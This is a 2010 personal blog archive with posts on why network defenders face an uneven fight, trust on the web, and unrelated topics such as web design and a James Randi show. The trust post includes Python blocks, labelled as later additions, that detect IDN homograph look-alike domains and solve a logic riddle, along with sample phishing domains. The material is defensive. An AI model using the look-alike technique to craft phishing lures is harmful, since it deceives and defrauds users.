Forgive me for not being impressed, but I have never had any high thoughts about those so called “hackers”. I’m talking about “hackers” in the meaning “people that attack and subvert IT-systems”, not the positive term meaning “computer wizards”.
My sympathy goes to the embattled system administrators fighting an unfair fight to keep systems secure. Ok, let’s be honest. My beef is not with the people finding, documenting and communicating vulnerabilities to the world. They deserve a big collective thank-you note. I’m just tired of how media tries to give the cyber-villains an almost godlike status. They miss out on quite a few things about how tilted the balance is.
Here’s my (incomplete!) top 10 list of why hacking is so unfair to us defending the networks. When I use the term “we” I refer to any organization, corporation or group of people owning an Internet presence that they’re trying to keep secure. This essay covers a general view of security problems that we all can relate to, not the state of any specific entity.
10. We can’t see them in their true form – they see us only that way
“The ultimate in disposing one's troops is to be without ascertainable shape. Then the most penetrating spies cannot pry in nor can the wise lay plans against you.”
- Sun Tzu, “The art of war”
We, the defenders, have a shape and a size. As do the systems that we seek to defend. The assets we protect are most likely physical to a certain degree. Consider the cost of finding information about us: it’s relatively small. We want to be found, as we want to be seen. Hackers prefer to be anonymous and hard to trace. You do the math.
9. They’re simple – we’re complex.
“Fatal accidents never have just a single cause, they happen at the end of a whole series of errors.”
- Charles Stross, “The Fuller memorandum”.
As the size of the organization grows, so does the complexity. But don’t forget that time works against us as well. We install new servers, set up support systems, install applications, add functions, add features and create our own programs and scripts. Over time many of these become obsolete or forgotten, or we may stop developing them. We may not even remember if they’re in use or who used to be responsible for their care. Complexity increases exponentially, since systems interact and all components have the potential to affect each other. Especially if we know they shouldn’t be able to: then we won’t even consider the possibility. Let me give you a list of places where vulnerabilities appear. It’s mercifully short: everywhere. However, one type of vulnerability that gets way too little attention is the misconfiguration vulnerability. But I digress.
A good hacker generates just a modest amount of information in our logs, which he then tries to remove. In a flood of legitimate activity his actions tend to vanish. Especially if he understands the concept of time (see point 5).
8. They can pull the plug – we can’t
“Beware lest you lose the substance by grasping at the shadow.”
- Aesop
There’s an episode of the TV-series “NCIS” where two of the characters find out that a virus is running rampant on one of their computers. They scramble to stop it the way Hollywood always deals with this situation: by letting the characters frantically hammer the keyboard while going through various stages of panic. Finally their boss walks in and pulls the plug on the computer, solving the problem in the best possible way.
Whether this is a good idea in real life is hard to say. If you pull the plug you risk losing logged activity not yet written to disk, and you may make the hacker realize that he’s been caught. The calling card of a good hacker is not leaving one. But they may feel the need to erase all logs and evidence if there’s a risk that we’re onto them. So instead of a few “doctored” logs, missing relevant data, we might end up with nothing. Or we might cut them off before we get enough information about what they’re up to and how far they’ve come.
Then there’s the problem of shooting ourselves in the foot by shutting down the network. We kind of need our network and our servers running in order to exist and make money, right? Hackers can drop off the network, lie low and then find a new proxy or connection to strike from.
7. Neither of us has a full overview – They don’t need one
“Every solution breeds new problems.”
- One of Murphy’s laws.
Knowing the land should be our advantage. The hackers have to figure it all out, but we already know everything, right? Maybe. Hopefully.
The problem is that we may have this advantage, but they don’t need it. Before a hacker strikes, he or she does some serious background information gathering … or not. We have to understand that the attacks may not target us specifically. Hackers have their reasons. Often the fact that we have a fast enough network, people trust us and that we have computational power in the form of servers can be reason enough. Automated SQL-injection scripts scour the Internet for vulnerable web/application servers they can exploit and use to attack unsuspecting web surfers trusting them. Or we could have an attacker targeting us that actually needs to do some research about us. Either way, they only need enough information about us to find a way in.
Our security cannot be based on withholding as much information about ourselves as possible. This is “security by obscurity”. But we can use it as a way to make us a tougher target and to win a bit of time. Time that is wasted unless we can also detect them.
6. Hackers have one goal
“Concentration is the secret of strength.”
- Ralph Waldo Emerson
We have a lot of goals. If we’re a political organization, outreach is an important one. If we’re commercial, the bottom line is king. We also have many smaller goals, mission statements and requirements to attend to. A hacker has one or a few.
We have one thing in common, though: a finite amount of resources.
5. Time is on their side
“Ability is of little account without opportunity.”
- Napoleon Bonaparte
How time works for an attacker depends on their goals. A hacker that needs to get full access to a network may take over one server or a PC and then use it as a bridgehead. This allows the hacker to try to monitor network traffic or to attack other systems. He might be able to take over a PC and make it crash. After a while, when it’s back online, he can connect to it again and harvest the password hashes. It’s quite likely that an administrator has logged on to restore the PC, and thus stored his password on it. If the hacker lies low and lets some time pass between every action, he can use the time to his advantage. Any suspicious pattern drowns in the sheer amount of data being logged, and eventually the logs roll over and it gets deleted. The key is that a good hacker working to get into the network of a known target lies low and awaits opportunities. A hacker just searching for any vulnerable target on the Internet does not necessarily need to concern himself with timing at all.
The good news is that time can be on our side too. It depends on whether we can detect the intrusion and keep monitoring the hacker while he works. Then time is on our side and we can gather evidence.
And another thing about time: security deteriorates over time. We cannot just stop applying patches, verifying settings, hardening baselines and monitoring traffic. And there’s no guarantee that we won’t miss one or a few systems.
4. We can’t strike back
"For every problem, there is one solution which is simple, neat and wrong."
- Henry Louis Mencken
I admit that the legal side of IT-security is not my strong suit. But it’s all about a bit of common sense: as a white hat working for a reputable organization you really should think twice before trying to strike back or “counter-hack” the hacker.
The reasons are mostly legal ones, but as you probably understand there are many bad things that could happen. What if the system the hacker uses belongs to an unsuspecting party, like a corporation or foreign government?
The correct approach to this problem must involve your incident response team. But this is out of the scope of this discussion.
3. We can’t repair the damage right away
“Haste in every business brings failure.”
- Herodotus
When a hack happens, trying to sanitize the systems and get everything working again seems like a good idea. It may actually be a good idea, if you have no intention to catch the perpetrator. If you do, touching the crime scene will invalidate the evidence and probably destroy some or all of the tracks.
2. They gain reputation the same way we lose ours
“Character is like a tree and reputation its shadow. The shadow is what we think it is; the tree is the real thing.”
- Abraham Lincoln
They stand to win reputation, money and “goodwill” with organizations that hire hackers to do things like this. The opposite is true for us. We risk losing reputation, money and goodwill with people that trust us.
1. Hackers only have to find one way in – We have to close all of them.
“If an elderly but distinguished scientist says that something is possible he is almost certainly right, but if he says that it is impossible he is very probably wrong.”
- Arthur C. Clarke
“As a young boy, I was taught in high school that hacking was cool.”
- Kevin Mitnick
And the number one reason it’s unfair: you can prove a system vulnerable but not the opposite. Proving that something does not exist is known as “proving a negative”. It just can’t be done. Sorry.
It’s the big thing that works against us. If we could apply hard work and reshape the network with all its components into a provably invulnerable network, we could just close the door and leave the whole security problem behind. But we cannot!
And of course, a hacker can get lucky and gain entrance by exploiting just one single vulnerability. Most of the time they need more than one, but you can’t prove it isn’t possible to fully own a network through one single vulnerability.
So to conclude: complexity is the killer. It comes back in all of the examples.
Tags: Security, hacking
Posted 2010-07-14 by Erik Zalitis, changed 2010-07-15 by Erik Zalitis
(2010-07-13) Coming soon: a book review of the "Fuller Memorandum".
I've just finished Charles Stross's book the "Fuller Memorandum". I must say it was a very positive experience. A review will come to this site in a few days...
Tags: Charles Stross, Fuller memorandum, Atrocity archives, Book review
Posted 2010-07-13 by Erik Zalitis, changed 2010-07-13 by Erik Zalitis
(2010-07-05) The dreaded vacuum of vacation
So finally vacation is upon me. I just can't sit at home. Have to see things and do stuff. Have to travel and have to experience. Or do I? What's wrong with this picture? I'll say it's the two little words "Have" and "to" in that order. Vacation is supposed to be a time of no stress and no duties, right? Still you "have to" do things. So people stuff their dear ones into a crammed car and drive somewhere. Anywhere but here. Then they try to force happiness onto themselves because you gotta be happy, damn it. Guess how it turns out?
If you run away from something, you're a fugitive, not someone about to arrive somewhere. So far I've spent time drinking beer with my friends, organized my CD-collection, written some php-code, spent time with my friends, watched a lot of Futurama and slept a lot. It feels good and I haven't traveled anywhere special. I will travel if I want to and not because I "should". I hope you have a great vacation, and get to use it to do whatever you and your family wants to. Relax!
Tags: Philosophy, musings
Posted 2010-07-05 by Erik Zalitis, changed 2010-07-05 by Erik Zalitis
(2010-06-25) When conflicts become permanent
There's an old saying here in Sweden (although it may not be Swedish) that goes "Det inte ens fel när två träter". In English it goes something like "It's not one person's fault when two fight". My hard-learned lesson is that all conflicts call for confrontation. If that does not happen, the conflict eventually gets frozen. It may be painful to go through talking with the person or persons involved in it, whether or not you're a part of the conflict.
But failing to do so often ends in a perennial state of animosity between the parties. When you confront someone, both you and they will set up heavy defenses. The first reaction of someone that is accused of something is to find excuses, fling accusations back at the accuser or come with their own accusations. There's nothing wrong with that reaction in itself, since it's a very hard thing to go through. And they may actually be right, don't forget that! If the confronting party comes across as wanting a solution while showing no signs of stubborn pride or a condescending tone, there's hope of a good resolution.
The only non-solution is never to confront. So many horrible excuses exist for this. The most common is "It's not possible to argue with him/her/them". This is the biggest pile of bullshit taking the form of spoken word ever! Whoever says something like that does not dare to go through the confrontation, wants someone else to do it for them or stands to gain something from the conflict itself.
I am poor with confrontations myself, like most people. So these are words of wisdom to myself just as much as for others. But believe me, they are words of wisdom.
Tags: Psychology, ethics
Posted 2010-06-25 by Erik Zalitis, changed 2010-06-25 by Erik Zalitis
(2010-06-19) Website design, compliance and optimization
I consider myself a pretty decent script-writer. The authoring system for this web site is something I've created. It's pretty rudimentary but works. But the graphical design is something I'm just not very good at. So far all my sites have had a rather "creative" look, where "creative" is a euphemism for amateurish. Eventually I caved in and started looking for premade designs.
A friend of mine pointed me at "Artisteer 2", a commercial program that allows you to create good looking websites. One man's "good looking site" is another man's "drab cookie-cutter designed site". So what?
Web site design is like clothing: if you dress badly, people will not judge you by your character, but by your clothes. Or rather: you have to be rather obnoxious for people to miss how you dress. If you dress normally, you will be judged by who you are. That may be a stretch, but work with me here folks. And that's how far the metaphor goes without breaking. If you dress sharply, people might be inclined to get a better first impression of you. This is not true for websites! When was the last time you even noticed a site because of its beautiful design? 1999? If so, wasn't it because most other sites looked like a ransom note done by a drunken chimpanzee?
Really, as the web has matured, compliance and optimization are the key words here. At least that's how I see things. Compliance is about making the web sites function well for all devices and browsers out there. PC and Mac may be the least of our worries as people surf the web through cell phones, TVs and gaming consoles. Optimization is an even bigger challenge. This site functions on Windows, Mac and Linux. It plays nice with Internet Explorer and Firefox as far as I've tested. It looks all right on my HTC Desire. That's due to the site being compliant enough. But optimization means serving different layouts to different devices.
If I choose to strip out the menu and headers when someone with a smartphone loads the page, they won't have to zoom in to read the text. Alas, this site won't do that. I hope to get around to implementing such a function in the future. I do have a plan to implement RSS feeds, which will allow the site to function on my Sony Bravia TV and many other devices. This is optimization and it's the other important thing in design.
Because I don't know when to stop, here's the third thing: navigation. Unless you're interested in the site or the information you're getting, you have little desire to navigate. If it isn't on the front page it will most likely not be found unless you come in from a search result.
So to wrap it up: I believe focusing on amazing graphical design and trying to make it look "cool" is overrated as well as 10 years too late. Instead focus on making it available to everyone and letting them have everything instantly accessible.
Tags: Web site design
Posted 2010-06-19 by Erik Zalitis, changed 2010-06-19 by Erik Zalitis
(2010-06-17) The always amazing Randi

I live in Sweden, so I will have to travel far to meet people like James Randi. That is unless they decide to go on a tour and visit Sweden, which fortunately Mr Randi did. So on the 15th of June 2010 I went to see his appearance at the Oskar Klein Auditorium which is located on the premises of the Royal Institute of Technology here in Stockholm.
The event was organized by the Swedish skeptics organisation "Vetenskap och Folkbildning". As one of their members I must say I'm impressed that they got the legendary illusionist and paranormal debunker to come to Stockholm. I wasn't as impressed with how they handled the logistics. Many of us barely got a ticket and they had to cram the auditorium to allow everyone entrance. But it's a minor complaint.
What makes a magician "magic"? I won't go into detail, because it would spoil all the fun. But he used the first five minutes of the show to demonstrate that things are not what they appear to be, using among other things a beard trimmer. The lesson is simple: we all assume things about what we see. A good illusionist knows exactly what his or her audience believes that they see and uses this against them.
Randi is not here just to entertain. He started the "James Randi Educational Foundation", whose goal "(...) is to promote critical thinking by reaching out to the public and media with reliable information about paranormal and supernatural ideas so widespread in our society today". They're most famous for their $1 million challenge. The first person who can prove their psychic or paranormal abilities gets the money. So far no one has ever succeeded. It's not for lack of trying, if you believe Mr Randi.
He went on to demonstrate why there can be serious problems with things like new age medicine or psychic healing and their unverifiable claims. A number of years ago he managed to uncover a scam where a TV evangelist used a wireless earpiece and some social trickery to fool people into thinking that he could heal them through god. Of course he charged them for it and most likely caused people not to seek proper medical attention. This could prove to be fatal.
The most valuable lessons from the whole event were when Randi reminded us that "people that get fooled are not stupid, just uninformed" and when he explained why you cannot prove a negative: "I can prove to you that I'm not a giraffe but I cannot prove that there are no unicorns in Africa".
His explanations were blended with video clips from his career and sprinkled with many interesting anecdotes. Everything was delivered with a subtle, a bit dry and very charming humor that made me laugh and think at the same time. He also made a lot of fun of people carrying the title Doctor of Philosophy. I may read too much into it, but I can't help suspecting that he feels that he is in a weak position since he himself lacks an academic title. Projection, anyone?
Still, he was both funny and dead serious at the same time and kept my undivided attention for the whole two hours the show lasted. I walked home feeling that I'd encountered a true showman with his heart in the right place and the brains to match.
James Randi gets a full score from me (5/5). If he comes to your town or your country, I highly recommend that you get a ticket!
Tags: James Randi, skeptics, Vetenskap och folkbildning
Posted 2010-06-17 by Erik Zalitis, changed 2010-06-18 by Erik Zalitis
(2010-06-17) Am I evil? Or why evil people won't say yes
There's an old riddle that I've heard told in many different ways. Here's my version: "Assume you're surfing to three web sites and want to know which you can trust. You’ve been told that good sites have a banner certifying them as malware free. They will never spread malware and everything they say is true. Bad sites always spread malware and will never have a banner stating otherwise. They always lie. And then there are sites that may or may not have a banner and may or may not spread malware. They randomly lie and tell the truth.
Of those three sites one site will always say the truth, one will always lie and one will be truthful or lying depending on who's controlling it.
Site 1 has a banner stating "This site is always malware free"
Site 2 has no banner but states that "Site 1 is indeed always malware free"
Site 3 states "you may be attacked by me or maybe I'm malware free."
Which is which?"
(The answer is at the bottom of the post)
If only life were this simple. But it’s not like I’m making this up. There are plenty of banners certifying sites as safe, secure, family safe or whatever. There are lots of sites out there making no claims of being either, and then of course sites saying that they take no responsibility for what people publish there. Then there are sites claiming things about other sites. So the old knights and knaves riddle is not totally wrong as a metaphor. The problem is: which is which? That is a riddle that cannot be solved so easily.
The solution that works best is the “web of trust” model. You do it all day. When you hear about a new brand, you ask your friends if it’s any good. You may buy a magazine whose reviewers you trust. Maybe you buy some of the new brand’s cheaper products just to see if they’re good without spending cash on a risk. Your gut feeling can tell you about it.
On the Internet it’s harder, but by no means impossible. Links from a site you trust will probably not point to untrustworthy sites. But what about links from those sites? For every jump away from the centre of trust, the risk increases. Brand recognition can help you. Tieto is trustworthy, so tieto.com should be fine. But if you get an email from an unknown source telling you to go to the new patch site for Tieto servers, located at pathes-tieto.trust-me.nu, you will probably be a bit more skeptical.
For every day that passes, bad guys find new ways to abuse trust. The whole idea of phishing is based on the fact that you can look trustworthy by looking like someone everyone trusts. Wolves in sheep-skins do exist outside the story books, I’m afraid.
Then there are even more insidious ways to abuse trust. Links encoded to look like they point to a site but really go somewhere else. And someone figured out a way to abuse Unicode in IDN domain names by using an obscure letter that looked like an “a” and then registering domain names with well known brand names where the “a” was replaced with … that’s right … the obscure letter. 1) So a user surfing to citibank.com may still get tricked.
And the list goes on and on. The attacks often target weaknesses in software, but as patches and better security designs come along, the human behind the keyboard becomes a more useful target.
The only way we can solve this is to apply skepticism and think about how to validate trust. In a perfect world, whitelisting everything would make everything better. That is, only allow people to do what is deemed safe. This cannot be done here, as it’s against the nature of the Internet. Doing it on the users’ computers can work, but users will complain about the annoying “do you want this program to access the internet” prompts. Bruce Schneier recently wrote an article about it. 2) I like it, because he writes what I’ve thought about for many years: is blacklisting (like antivirus software does) still a good solution? Still, the world is not perfect, so we have to decide how to decrease our own risk and how to act to protect others.
But to wrap it up: I’m pretty sure about one thing, censoring the Internet or putting up block lists is a poor solution. Prosecution of hackers, spammers and other “cyber-criminals” is probably money better spent. We cannot protect people from themselves, but we can teach them a more secure behavior when they’re surfing. Teach a man how to fish (and how not to get phished) and all of that, you know.
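The look-alike domain trick described above, as an added example that is not part of the original post: a small Python checker that decodes punycode labels, flags a label that mixes scripts (Latin plus Cyrillic, say), and folds a constructed subset of confusable letters to their Latin twins to see whether a name is a look-alike of a brand you already trust. TRUSTED_DOMAINS and CONFUSABLES are constructed sample data, not a real trust list.

```python
"""Added example (not from the original post): spot IDN homograph look-alikes.
Two defender-side checks: a label mixing scripts, and a registrable domain that,
once confusable letters are folded to Latin, equals a trusted brand."""
import unicodedata

TRUSTED_DOMAINS = {"citibank.com", "tieto.com"}   # constructed sample list

# Constructed subset of Unicode confusables (look-alike -> Latin letter).
# A real deployment would load the full UTS #39 confusables table.
CONFUSABLES = {
    "\u0430": "a",  # CYRILLIC SMALL LETTER A
    "\u0435": "e",  # CYRILLIC SMALL LETTER IE
    "\u043e": "o",  # CYRILLIC SMALL LETTER O
    "\u0440": "p",  # CYRILLIC SMALL LETTER ER
    "\u0441": "c",  # CYRILLIC SMALL LETTER ES
    "\u0455": "s",  # CYRILLIC SMALL LETTER DZE
    "\u0456": "i",  # CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
    "\u03b1": "a",  # GREEK SMALL LETTER ALPHA
    "\u03bf": "o",  # GREEK SMALL LETTER OMICRON
}

def to_unicode(hostname: str) -> str:
    """Decode punycode labels (xn--...) so the real letters can be inspected."""
    labels = []
    for label in hostname.strip().lower().split("."):
        if label.startswith("xn--"):
            label = label.encode("ascii").decode("idna")
        labels.append(label)
    return ".".join(labels)

def script_of(ch: str) -> str:
    """Crude script name: the first word of the Unicode character name.
    Digits and hyphens count as COMMON so they never trigger a mixed-script hit."""
    if ch.isdigit() or ch == "-":
        return "COMMON"
    return unicodedata.name(ch, "UNKNOWN").split(" ")[0]

def skeleton(label: str) -> str:
    """Fold confusable letters to their Latin look-alike."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in label)

def classify(hostname: str) -> dict:
    """Return which checks fired and an overall verdict for one hostname."""
    uni = to_unicode(hostname)
    result = {"mixed_script": False, "brand_lookalike": None, "verdict": "unknown"}
    if uni in TRUSTED_DOMAINS:
        result["verdict"] = "trusted"
        return result
    for label in uni.split("."):
        if len({script_of(c) for c in label} - {"COMMON"}) > 1:
            result["mixed_script"] = True
    # Compare the registrable part (last two labels here; real code would use
    # the public suffix list) against trusted brands after folding confusables.
    folded = skeleton(".".join(uni.split(".")[-2:]))
    if folded in TRUSTED_DOMAINS:
        result["brand_lookalike"] = folded
        result["verdict"] = "homograph"
    elif result["mixed_script"]:
        result["verdict"] = "mixed-script"
    return result

if __name__ == "__main__":
    # "citib\u0430nk" uses a Cyrillic a in place of the Latin one.
    for host in ("citibank.com", "citib\u0430nk.com", "pathes-tieto.trust-me.nu"):
        print(host, classify(host))
```

Note that pathes-tieto.trust-me.nu comes back as "unknown", not "homograph": it is a plain, differently registered domain, which is exactly why brand recognition rather than letter-by-letter inspection is the check that catches it.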
Answer to the riddle
Site 3 cannot always be malware free because it says it can have malware sometimes. It can't be truthful, since it's claiming to be random. A truthful system would never do that.
Site 2 cannot be malware free because it claims that another site is malware free. If it were truthful, then both site 1 and 2 would be truthful. If it were lying, then both site 1 and 2 would be lying.
Site 1 is therefore malware free.
Which site is bad and which is random?
Site 2 is actually saying something that is true, so it must be the site randomly lying and randomly telling the truth. This leaves site 3 as the liar.
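The same answer, reached by brute force rather than by hand, as an added example that is not part of the original post: every assignment of the three roles to the three sites is tried and only those consistent with what each site said survive. How each statement is modelled (site 1 and site 2 both amount to "site 1 is truthful", site 3 amounts to "I am random") is an assumption made for this example.

```python
"""Added example (not from the original post): brute-force the three-site
knights-and-knaves riddle by checking every role assignment for consistency."""
from itertools import permutations

ROLES = ("truthful", "liar", "random")
SITES = (1, 2, 3)

def claims(roles: dict) -> dict:
    """Truth value of each site's statement under a candidate role assignment.
    Statement models (assumptions made for this example):
      site 1: "I am always malware free"          -> site 1 is truthful
      site 2: "site 1 is always malware free"     -> site 1 is truthful
      site 3: "I may or may not be malware free"  -> site 3 is random
    """
    return {
        1: roles[1] == "truthful",
        2: roles[1] == "truthful",
        3: roles[3] == "random",
    }

def consistent(roles: dict) -> bool:
    """A truthful site only says true things, a liar only false things,
    and a random site is unconstrained."""
    for site, said_true in claims(roles).items():
        if roles[site] == "truthful" and not said_true:
            return False
        if roles[site] == "liar" and said_true:
            return False
    return True

def solve() -> list:
    """Return every consistent assignment as a dict of site -> role."""
    candidates = (dict(zip(SITES, perm)) for perm in permutations(ROLES))
    return [roles for roles in candidates if consistent(roles)]

if __name__ == "__main__":
    for solution in solve():
        print(solution)
```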
Knights and knaves: http://sites.google.com/site/newheiser/knightsandknaves
1) http://en.wikipedia.org/wiki/IDN_homograph_attack
The Unicode way to bypass spam filters: http://nedbatchelder.com/blog/200504/phishing_fun_with_unicode.html
2) Cryptogram for November 2009, “Is Antivirus dead?”: http://www.schneier.com/crypto-gram-0911.html#10
Tags: Ethics
Posted 2010-06-17 by Erik Zalitis, changed 2010-06-17 by Erik Zalitis